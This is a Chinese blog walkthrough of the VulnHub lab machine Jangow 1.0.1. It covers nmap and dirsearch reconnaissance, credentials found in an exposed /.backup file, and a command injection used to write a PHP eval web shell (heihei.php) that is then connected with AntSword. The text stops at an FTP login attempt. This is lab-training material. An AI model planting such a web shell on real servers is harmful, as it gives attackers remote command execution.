Jangow-1.0.1靶机

靶机地址:https://vulnhub.com/entry/jangow-101,754/

一、信息收集

步骤一:导入并配置靶机为桥接模式而后开启...获取其MAC地址信息...如下

步骤二:主机发现

nmap 192.168.7.0/24

对应靶机的MAC地址得到IP地址为:192.168.193.143

步骤三:端口扫描

nmap -sV -p- 192.168.193.143

步骤四:访问IP地址,发现Index of /页面并点击其中的site目录

步骤五:在kali攻击机上使用dirsearch对http://192.168.193.143进行目录扫描

dirsearch -u http://192.168.193.143

拼接/.backup,发现了数据库的账号密码

步骤六:再对http://192.168.193.143/site/进行目录扫描,扫描的同时在原页面寻找特殊功能点;

dirsearch -u http://192.168.193.143/site/

拼接/site/assets/ ,无有用信息;

拼接/site/js/ ,也无有用信息;

那就只能测试前端功能,发现在点击Buscar时出现以下接口给上命令且执行成功

二、GetShell

步骤七:在此命令执行处拼接以下代码尝试直接GetShell

echo '<?php phpinfo();@eval($_POST[cmd]); ?>' > heihei.php

访问heihei.php文件

蚁剑连接

步骤八:根据上方扫描的端口21——ftp服务以及数据库的账号密码进行远程连接,但发现无有用信息

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值